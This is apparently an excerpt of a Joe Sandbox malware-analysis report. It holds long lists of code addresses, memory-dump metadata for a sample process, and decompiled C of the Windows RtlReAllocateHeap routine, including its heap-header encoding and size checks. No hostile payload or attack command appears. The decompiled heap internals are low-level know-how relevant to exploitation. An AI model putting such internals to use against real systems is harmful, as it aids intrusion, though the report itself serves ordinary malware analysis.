                                                                                                                                                                                            0x33d992d3
                                                                                                                                                                                            0x33d992d8
                                                                                                                                                                                            0x33d992d8
                                                                                                                                                                                            0x33d992da
                                                                                                                                                                                            0x33d992dd
                                                                                                                                                                                            0x33d992dd
                                                                                                                                                                                            0x33d992df
                                                                                                                                                                                            0x33d992e3
                                                                                                                                                                                            0x33d992e4
                                                                                                                                                                                            0x33d992ea
                                                                                                                                                                                            0x33d992ef
                                                                                                                                                                                            0x33d992f4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d992fa
                                                                                                                                                                                            0x33d992fc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99302
                                                                                                                                                                                            0x33d99306
                                                                                                                                                                                            0x33d99309
                                                                                                                                                                                            0x33d9947c
                                                                                                                                                                                            0x33d99482
                                                                                                                                                                                            0x33d9961c
                                                                                                                                                                                            0x33d99622
                                                                                                                                                                                            0x33d99674
                                                                                                                                                                                            0x33d99679
                                                                                                                                                                                            0x33d99728
                                                                                                                                                                                            0x33d99728
                                                                                                                                                                                            0x33d9972d
                                                                                                                                                                                            0x33d99731
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99737
                                                                                                                                                                                            0x33d99737
                                                                                                                                                                                            0x33d9973a
                                                                                                                                                                                            0x33d99805
                                                                                                                                                                                            0x33d9980e
                                                                                                                                                                                            0x33d99811
                                                                                                                                                                                            0x33d99819
                                                                                                                                                                                            0x33d9981d
                                                                                                                                                                                            0x33d99821
                                                                                                                                                                                            0x33d99829
                                                                                                                                                                                            0x33d99831
                                                                                                                                                                                            0x33d99834
                                                                                                                                                                                            0x33d99836
                                                                                                                                                                                            0x33d99836
                                                                                                                                                                                            0x33d9983b
                                                                                                                                                                                            0x33d9983f
                                                                                                                                                                                            0x33d99842
                                                                                                                                                                                            0x33d9984d
                                                                                                                                                                                            0x33d99844
                                                                                                                                                                                            0x33d99846
                                                                                                                                                                                            0x33d99847
                                                                                                                                                                                            0x33d99847
                                                                                                                                                                                            0x33d99851
                                                                                                                                                                                            0x33d99857
                                                                                                                                                                                            0x33d9985e
                                                                                                                                                                                            0x33d99864
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99866
                                                                                                                                                                                            0x33d99866
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99859
                                                                                                                                                                                            0x33d99859
                                                                                                                                                                                            0x33d99869
                                                                                                                                                                                            0x33d99869
                                                                                                                                                                                            0x33d9986d
                                                                                                                                                                                            0x33d9986d
                                                                                                                                                                                            0x33d99871
                                                                                                                                                                                            0x33d9987c
                                                                                                                                                                                            0x33d99882
                                                                                                                                                                                            0x33d99884
                                                                                                                                                                                            0x33d99886
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99888
                                                                                                                                                                                            0x33d99888
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99888
                                                                                                                                                                                            0x33d99857
                                                                                                                                                                                            0x33d99744
                                                                                                                                                                                            0x33d99748
                                                                                                                                                                                            0x33d99755
                                                                                                                                                                                            0x33d9975c
                                                                                                                                                                                            0x33d9975d
                                                                                                                                                                                            0x33d99764
                                                                                                                                                                                            0x33d9976b
                                                                                                                                                                                            0x33d99776
                                                                                                                                                                                            0x33d99781
                                                                                                                                                                                            0x33d99788
                                                                                                                                                                                            0x33d9978a
                                                                                                                                                                                            0x33d9978c
                                                                                                                                                                                            0x33d9978c
                                                                                                                                                                                            0x33d99791
                                                                                                                                                                                            0x33d99798
                                                                                                                                                                                            0x33d9979e
                                                                                                                                                                                            0x33d997a2
                                                                                                                                                                                            0x33d997a3
                                                                                                                                                                                            0x33d997a3
                                                                                                                                                                                            0x33d997aa
                                                                                                                                                                                            0x33d997ad
                                                                                                                                                                                            0x33d997af
                                                                                                                                                                                            0x33d997af
                                                                                                                                                                                            0x33d997b2
                                                                                                                                                                                            0x33d997b2
                                                                                                                                                                                            0x33d997bd
                                                                                                                                                                                            0x33d997c9
                                                                                                                                                                                            0x33d997d6
                                                                                                                                                                                            0x33d997de
                                                                                                                                                                                            0x33d997e5
                                                                                                                                                                                            0x33d997f0
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d997f0
                                                                                                                                                                                            0x33d9967f
                                                                                                                                                                                            0x33d99683
                                                                                                                                                                                            0x33d99687
                                                                                                                                                                                            0x33d99693
                                                                                                                                                                                            0x33d99697
                                                                                                                                                                                            0x33d996b3
                                                                                                                                                                                            0x33d996b8
                                                                                                                                                                                            0x33d996bd
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d996cb
                                                                                                                                                                                            0x33d996d0
                                                                                                                                                                                            0x33d996d4
                                                                                                                                                                                            0x33d996e1
                                                                                                                                                                                            0x33d996ed
                                                                                                                                                                                            0x33d996f5
                                                                                                                                                                                            0x33d996fc
                                                                                                                                                                                            0x33d99704
                                                                                                                                                                                            0x33d9970c
                                                                                                                                                                                            0x33d99714
                                                                                                                                                                                            0x33d9971a
                                                                                                                                                                                            0x33d9971c
                                                                                                                                                                                            0x33d9971e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99724
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99724
                                                                                                                                                                                            0x33d99689
                                                                                                                                                                                            0x33d9968d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9968d
                                                                                                                                                                                            0x33d99624
                                                                                                                                                                                            0x33d99629
                                                                                                                                                                                            0x33d9962d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9963b
                                                                                                                                                                                            0x33d99644
                                                                                                                                                                                            0x33d99647
                                                                                                                                                                                            0x33d9964b
                                                                                                                                                                                            0x33d9964f
                                                                                                                                                                                            0x33d99657
                                                                                                                                                                                            0x33d9965f
                                                                                                                                                                                            0x33d99667
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99667
                                                                                                                                                                                            0x33d99492
                                                                                                                                                                                            0x33d99497
                                                                                                                                                                                            0x33d9949a
                                                                                                                                                                                            0x33d994a2
                                                                                                                                                                                            0x33d994a4
                                                                                                                                                                                            0x33d994ac
                                                                                                                                                                                            0x33d994b3
                                                                                                                                                                                            0x33d994b7
                                                                                                                                                                                            0x33d994f4
                                                                                                                                                                                            0x33d994f8
                                                                                                                                                                                            0x33d994fb
                                                                                                                                                                                            0x33d994ff
                                                                                                                                                                                            0x33d99503
                                                                                                                                                                                            0x33d99505
                                                                                                                                                                                            0x33d99507
                                                                                                                                                                                            0x33d99509
                                                                                                                                                                                            0x33d9950f
                                                                                                                                                                                            0x33d9950b
                                                                                                                                                                                            0x33d9950b
                                                                                                                                                                                            0x33d9950b
                                                                                                                                                                                            0x33d99509
                                                                                                                                                                                            0x33d99515
                                                                                                                                                                                            0x33d9953d
                                                                                                                                                                                            0x33d9953d
                                                                                                                                                                                            0x33d9953f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99522
                                                                                                                                                                                            0x33d99524
                                                                                                                                                                                            0x33d9952d
                                                                                                                                                                                            0x33d9952f
                                                                                                                                                                                            0x33d9952f
                                                                                                                                                                                            0x33d99531
                                                                                                                                                                                            0x33d9953b
                                                                                                                                                                                            0x33d9953b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9953b
                                                                                                                                                                                            0x33d99533
                                                                                                                                                                                            0x33d99535
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99537
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99537
                                                                                                                                                                                            0x33d99526
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99528
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99528
                                                                                                                                                                                            0x33d99550
                                                                                                                                                                                            0x33d99557
                                                                                                                                                                                            0x33d99557
                                                                                                                                                                                            0x33d99559
                                                                                                                                                                                            0x33d99561
                                                                                                                                                                                            0x33d9956a
                                                                                                                                                                                            0x33d99570
                                                                                                                                                                                            0x33d99574
                                                                                                                                                                                            0x33d99576
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99584
                                                                                                                                                                                            0x33d99589
                                                                                                                                                                                            0x33d9958c
                                                                                                                                                                                            0x33d99596
                                                                                                                                                                                            0x33d99597
                                                                                                                                                                                            0x33d9959b
                                                                                                                                                                                            0x33d9959f
                                                                                                                                                                                            0x33d995c1
                                                                                                                                                                                            0x33d995cd
                                                                                                                                                                                            0x33d995d8
                                                                                                                                                                                            0x33d995d8
                                                                                                                                                                                            0x33d995a1
                                                                                                                                                                                            0x33d995a1
                                                                                                                                                                                            0x33d995a8
                                                                                                                                                                                            0x33d995af
                                                                                                                                                                                            0x33d995b6
                                                                                                                                                                                            0x33d995b6
                                                                                                                                                                                            0x33d995e7
                                                                                                                                                                                            0x33d995ef
                                                                                                                                                                                            0x33d995f8
                                                                                                                                                                                            0x33d99601
                                                                                                                                                                                            0x33d99607
                                                                                                                                                                                            0x33d99609
                                                                                                                                                                                            0x33d9960b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99611
                                                                                                                                                                                            0x33d99611
                                                                                                                                                                                            0x33d99615
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99615
                                                                                                                                                                                            0x33d9960b
                                                                                                                                                                                            0x33d994bd
                                                                                                                                                                                            0x33d994c0
                                                                                                                                                                                            0x33d994c4
                                                                                                                                                                                            0x33d994cd
                                                                                                                                                                                            0x33d994cd
                                                                                                                                                                                            0x33d994cd
                                                                                                                                                                                            0x33d994cf
                                                                                                                                                                                            0x33d994d4
                                                                                                                                                                                            0x33d994e0
                                                                                                                                                                                            0x33d994e7
                                                                                                                                                                                            0x33d994eb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d994eb
                                                                                                                                                                                            0x33d9930f
                                                                                                                                                                                            0x33d99314
                                                                                                                                                                                            0x33d9933c
                                                                                                                                                                                            0x33d9933c
                                                                                                                                                                                            0x33d99340
                                                                                                                                                                                            0x33d9934a
                                                                                                                                                                                            0x33d9934f
                                                                                                                                                                                            0x33d99353
                                                                                                                                                                                            0x33d9935c
                                                                                                                                                                                            0x33d99368
                                                                                                                                                                                            0x33d99370
                                                                                                                                                                                            0x33d99377
                                                                                                                                                                                            0x33d9937f
                                                                                                                                                                                            0x33d99387
                                                                                                                                                                                            0x33d9938d
                                                                                                                                                                                            0x33d9938f
                                                                                                                                                                                            0x33d99391
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99397
                                                                                                                                                                                            0x33d9939b
                                                                                                                                                                                            0x33d993ef
                                                                                                                                                                                            0x33d993f5
                                                                                                                                                                                            0x33d99400
                                                                                                                                                                                            0x33d99400
                                                                                                                                                                                            0x33d99406
                                                                                                                                                                                            0x33d99408
                                                                                                                                                                                            0x33d9940c
                                                                                                                                                                                            0x33d99411
                                                                                                                                                                                            0x33d99411
                                                                                                                                                                                            0x33d99414
                                                                                                                                                                                            0x33d99418
                                                                                                                                                                                            0x33d99420
                                                                                                                                                                                            0x33d99425
                                                                                                                                                                                            0x33d99429
                                                                                                                                                                                            0x33d99436
                                                                                                                                                                                            0x33d99442
                                                                                                                                                                                            0x33d99449
                                                                                                                                                                                            0x33d99451
                                                                                                                                                                                            0x33d99459
                                                                                                                                                                                            0x33d99461
                                                                                                                                                                                            0x33d99465
                                                                                                                                                                                            0x33d9946b
                                                                                                                                                                                            0x33d9946d
                                                                                                                                                                                            0x33d9946f
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99475
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99475
                                                                                                                                                                                            0x33d9939d
                                                                                                                                                                                            0x33d993a5
                                                                                                                                                                                            0x33d993d6
                                                                                                                                                                                            0x33d993df
                                                                                                                                                                                            0x33d993e3
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d993e3
                                                                                                                                                                                            0x33d993a7
                                                                                                                                                                                            0x33d993c7
                                                                                                                                                                                            0x33d993cc
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d993cc
                                                                                                                                                                                            0x33d99316
                                                                                                                                                                                            0x33d9931c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9931e
                                                                                                                                                                                            0x33d99322
                                                                                                                                                                                            0x33d9932c
                                                                                                                                                                                            0x33d99332
                                                                                                                                                                                            0x33d99338
                                                                                                                                                                                            0x33d99334
                                                                                                                                                                                            0x33d99334
                                                                                                                                                                                            0x33d99334
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99332
                                                                                                                                                                                            0x33d99891
                                                                                                                                                                                            0x33d99891
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d99891
                                                                                                                                                                                            0x33d99296
                                                                                                                                                                                            0x33d990c8
                                                                                                                                                                                            0x33d990cd
                                                                                                                                                                                            0x33d990d0
                                                                                                                                                                                            0x33d990d8
                                                                                                                                                                                            0x33d990e4
                                                                                                                                                                                            0x33d99119
                                                                                                                                                                                            0x33d99123
                                                                                                                                                                                            0x33d9912b
                                                                                                                                                                                            0x33d99136
                                                                                                                                                                                            0x33d99140
                                                                                                                                                                                            0x33d99150
                                                                                                                                                                                            0x33d99159
                                                                                                                                                                                            0x33d99166
                                                                                                                                                                                            0x33d99173
                                                                                                                                                                                            0x33d9917d
                                                                                                                                                                                            0x33d9918a
                                                                                                                                                                                            0x33d99194
                                                                                                                                                                                            0x33d99198
                                                                                                                                                                                            0x33d9919e
                                                                                                                                                                                            0x33d991a5
                                                                                                                                                                                            0x33d991ac
                                                                                                                                                                                            0x33d991b2
                                                                                                                                                                                            0x33d991b4
                                                                                                                                                                                            0x33d991b6
                                                                                                                                                                                            0x33d991b9
                                                                                                                                                                                            0x33d991c0
                                                                                                                                                                                            0x33d991c2
                                                                                                                                                                                            0x33d991c4
                                                                                                                                                                                            0x33d991c9
                                                                                                                                                                                            0x33d991c9
                                                                                                                                                                                            0x33d991cb
                                                                                                                                                                                            0x33d991cb
                                                                                                                                                                                            0x33d991c4
                                                                                                                                                                                            0x33d991d2
                                                                                                                                                                                            0x33d991d8
                                                                                                                                                                                            0x33d991de
                                                                                                                                                                                            0x33d991e5
                                                                                                                                                                                            0x33d991e7
                                                                                                                                                                                            0x33d991e9
                                                                                                                                                                                            0x33d991eb
                                                                                                                                                                                            0x33d991ee
                                                                                                                                                                                            0x33d991f0
                                                                                                                                                                                            0x33d991f0
                                                                                                                                                                                            0x33d991f6
                                                                                                                                                                                            0x33d991f6
                                                                                                                                                                                            0x33d990e6
                                                                                                                                                                                            0x33d990ea
                                                                                                                                                                                            0x33d990ee
                                                                                                                                                                                            0x33d990ee
                                                                                                                                                                                            0x33d99208
                                                                                                                                                                                            0x33d9920e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d9920e

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: $ $0
                                                                                                                                                                                            • API String ID: 3446177414-3352262554
                                                                                                                                                                                            • Opcode ID: d135ee5f33c77c1a4b4594465a9eda48c44ca2a0932b4672ef49480cddc778f3
                                                                                                                                                                                            • Instruction ID: 033b74102d0202935ef0eeeb4176f28d2640193c45b0f67023f32e8d61dda5fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: d135ee5f33c77c1a4b4594465a9eda48c44ca2a0932b4672ef49480cddc778f3
                                                                                                                                                                                            • Instruction Fuzzy Hash: E23221B5A083818FE350CF68C884B9BBBE5BF88744F44492EF59AC7250D775E948CB52
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D9FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMONCrypto
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                            			E33D9FDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				intOrPtr _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x33dcd430);
				E33D47BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E33CE7662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E33DA02E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E33CEB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E33CFFED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
						 *(_t284 - 0x34) = _t226;
					}
					L33DA0835(_t281, 0);
					_t277 =  *((intOrPtr*)(_t284 + 8));
					_t269 = _t277 - 8;
					__eflags =  *((char*)(_t269 + 7)) - 5;
					if( *((char*)(_t269 + 7)) == 5) {
						_t269 = _t269 - (( *(_t269 + 6) & 0x000000ff) << 3);
						__eflags = _t269;
					}
					 *(_t284 - 0x2c) = _t269;
					 *(_t284 - 0x28) = _t269;
					_t240 = _t281;
					_t149 = E33CE753F(_t240, _t269, "RtlReAllocateHeap");
					__eflags = _t149;
					if(_t149 == 0) {
						L53:
						_t150 =  *(_t284 - 0x24);
						__eflags = _t150;
						if(_t150 == 0) {
							goto L73;
						}
						__eflags = _t150 -  *0x33de47c8; // 0x0
						_t151 =  *[fs:0x30];
						if(__eflags != 0) {
							_t152 =  *(_t151 + 0x68);
							 *(_t284 - 0x48) = _t152;
							__eflags = _t152 & 0x00000800;
							if((_t152 & 0x00000800) == 0) {
								goto L73;
							}
							__eflags =  *(_t284 - 0x20) -  *0x33de47cc; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x33de47ce; // 0x0
							if(__eflags != 0) {
								goto L73;
							}
							_t155 =  *[fs:0x30];
							__eflags =  *(_t155 + 0xc);
							if( *(_t155 + 0xc) == 0) {
								_push("HEAP: ");
								E33CEB910();
							} else {
								E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(E33D9823A(_t281,  *(_t284 - 0x20)));
							_push( *(_t284 + 0xc));
							E33CEB910("Just reallocated block at %p to 0x%Ix bytes with tag %ws\n",  *(_t284 - 0x24));
							L59:
							_t159 =  *[fs:0x30];
							__eflags =  *((char*)(_t159 + 2));
							if( *((char*)(_t159 + 2)) != 0) {
								 *0x33de47a1 = 1;
								 *0x33de4100 = 0;
								asm("int3");
								 *0x33de47a1 = 0;
							}
							goto L73;
						}
						__eflags =  *(_t151 + 0xc);
						if( *(_t151 + 0xc) == 0) {
							_push("HEAP: ");
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E33CEB910("Just reallocated block at %p to %Ix bytes\n",  *0x33de47c8);
						goto L59;
					} else {
						__eflags = _t277 -  *0x33de47c8; // 0x0
						_t172 =  *[fs:0x30];
						if(__eflags != 0) {
							_t173 =  *(_t172 + 0x68);
							 *(_t284 - 0x44) = _t173;
							__eflags = _t173 & 0x00000800;
							if((_t173 & 0x00000800) == 0) {
								L38:
								_t174 = E33D02710(_t281,  *(_t284 - 0x34), _t277,  *(_t284 + 0xc));
								 *(_t284 - 0x24) = _t174;
								__eflags = _t174;
								if(_t174 != 0) {
									_t75 = _t174 - 8; // -8
									_t278 = _t75;
									__eflags =  *((char*)(_t278 + 7)) - 5;
									if( *((char*)(_t278 + 7)) == 5) {
										_t278 = _t278 - (( *(_t278 + 6) & 0x000000ff) << 3);
										__eflags = _t278;
									}
									_t248 = _t278;
									 *(_t284 - 0x28) = _t278;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *(_t278 + 3) - (_t248[0] ^ _t248[0] ^  *_t248);
										if(__eflags != 0) {
											_push(_t248);
											_t269 = _t278;
											E33DAD646(0, _t281, _t278, _t278, _t281, __eflags);
										}
									}
									__eflags =  *(_t278 + 2) & 0x00000002;
									if(( *(_t278 + 2) & 0x00000002) == 0) {
										_t177 =  *(_t278 + 3);
										 *(_t284 - 0x1b) = _t177;
										_t178 = _t177 & 0x000000ff;
									} else {
										_t183 = E33D23AE9(_t278);
										 *(_t284 - 0x30) = _t183;
										__eflags =  *(_t281 + 0x40) & 0x08000000;
										if(( *(_t281 + 0x40) & 0x08000000) == 0) {
											 *_t183 = 0;
										} else {
											_t184 = E33D1FDB9(1, _t269);
											_t253 =  *(_t284 - 0x30);
											 *_t253 = _t184;
											_t183 = _t253;
										}
										_t178 =  *((intOrPtr*)(_t183 + 2));
									}
									 *(_t284 - 0x20) = _t178;
									__eflags =  *(_t281 + 0x4c);
									if( *(_t281 + 0x4c) != 0) {
										 *(_t278 + 3) =  *(_t278 + 2) ^  *(_t278 + 1) ^  *_t278;
										 *_t278 =  *_t278 ^  *(_t281 + 0x50);
										__eflags =  *_t278;
									}
								}
								L33DA0D24(_t281);
								__eflags = 0;
								L33DA0835(_t281, 0);
								goto L53;
							}
							__eflags =  *0x33de47cc;
							if( *0x33de47cc == 0) {
								goto L38;
							}
							_t279 =  *(_t284 - 0x28);
							_t269 =  *(_t284 - 0x2c);
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags = _t279[0] - ( *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269);
								if(__eflags != 0) {
									_push(_t240);
									E33DAD646(0, _t281, _t279, _t279, _t281, __eflags);
									_t269 =  *(_t284 - 0x2c);
								}
							}
							__eflags = _t279[0] & 0x00000002;
							if((_t279[0] & 0x00000002) == 0) {
								_t192 = _t279[0];
								 *(_t284 - 0x1a) = _t192;
								_t193 = _t192 & 0x000000ff;
							} else {
								_t209 = E33D23AE9(_t279);
								 *(_t284 - 0x30) = _t209;
								_t193 =  *(_t209 + 2) & 0x0000ffff;
							}
							_t255 = _t193;
							 *(_t284 - 0x20) = _t193;
							__eflags =  *(_t281 + 0x4c);
							if( *(_t281 + 0x4c) != 0) {
								_t279[0] =  *(_t269 + 2) ^  *(_t269 + 1) ^  *_t269;
								 *_t279 =  *_t279 ^  *(_t281 + 0x50);
								__eflags =  *_t279;
							}
							__eflags = _t255;
							if(_t255 == 0) {
								L37:
								_t277 =  *((intOrPtr*)(_t284 + 8));
							} else {
								__eflags = _t255 -  *0x33de47cc; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								__eflags =  *((intOrPtr*)(_t281 + 0x7c)) -  *0x33de47ce; // 0x0
								if(__eflags != 0) {
									goto L37;
								}
								_t195 =  *[fs:0x30];
								__eflags =  *(_t195 + 0xc);
								if( *(_t195 + 0xc) == 0) {
									_push("HEAP: ");
									E33CEB910();
								} else {
									E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t269 =  *(_t284 - 0x20);
								_push(E33D9823A(_t281,  *(_t284 - 0x20)));
								_push( *(_t284 + 0xc));
								_t277 =  *((intOrPtr*)(_t284 + 8));
								E33CEB910("About to rellocate block at %p to 0x%Ix bytes with tag %ws\n",  *((intOrPtr*)(_t284 + 8)));
								_t286 = _t286 + 0x10;
								L18:
								_t199 =  *[fs:0x30];
								__eflags =  *((char*)(_t199 + 2));
								if( *((char*)(_t199 + 2)) != 0) {
									 *0x33de47a1 = 1;
									 *0x33de4100 = 0;
									asm("int3");
									 *0x33de47a1 = 0;
								}
							}
							goto L38;
						}
						__eflags =  *(_t172 + 0xc);
						if( *(_t172 + 0xc) == 0) {
							_push("HEAP: ");
							E33CEB910();
						} else {
							E33CEB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *(_t284 + 0xc));
						E33CEB910("About to reallocate block at %p to %Ix bytes\n",  *0x33de47c8);
						_t286 = _t286 + 0xc;
						goto L18;
					}
				} else {
					_t283 =  *0x33de374c; // 0x0
					 *0x33de91e0(__ecx, __edx,  *((intOrPtr*)(_t284 + 8)),  *(_t284 + 0xc));
					_t132 =  *_t283();
					L75:
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0x10));
					return _t132;
				}
			}





































                                                                                                                                                                                            0x33d9fdf4
                                                                                                                                                                                            0x33d9fdf6
                                                                                                                                                                                            0x33d9fdfb
                                                                                                                                                                                            0x33d9fe02
                                                                                                                                                                                            0x33d9fe04
                                                                                                                                                                                            0x33d9fe09
                                                                                                                                                                                            0x33d9fe0c
                                                                                                                                                                                            0x33d9fe16
                                                                                                                                                                                            0x33d9fe35
                                                                                                                                                                                            0x33d9fe38
                                                                                                                                                                                            0x33d9fe46
                                                                                                                                                                                            0x33d9fe4b
                                                                                                                                                                                            0x33d9fe4d
                                                                                                                                                                                            0x33da0277
                                                                                                                                                                                            0x33da0277
                                                                                                                                                                                            0x33da027a
                                                                                                                                                                                            0x33da027a
                                                                                                                                                                                            0x33da02c2
                                                                                                                                                                                            0x33da02c9
                                                                                                                                                                                            0x33da02ce
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33da02ce
                                                                                                                                                                                            0x33d9fe56
                                                                                                                                                                                            0x33d9fe58
                                                                                                                                                                                            0x33d9fe62
                                                                                                                                                                                            0x33d9fe65
                                                                                                                                                                                            0x33d9fe69
                                                                                                                                                                                            0x33d9fe72
                                                                                                                                                                                            0x33d9fe72
                                                                                                                                                                                            0x33d9fe6b
                                                                                                                                                                                            0x33d9fe6b
                                                                                                                                                                                            0x33d9fe6b
                                                                                                                                                                                            0x33d9fe81
                                                                                                                                                                                            0x33d9fe84
                                                                                                                                                                                            0x33d9fe87
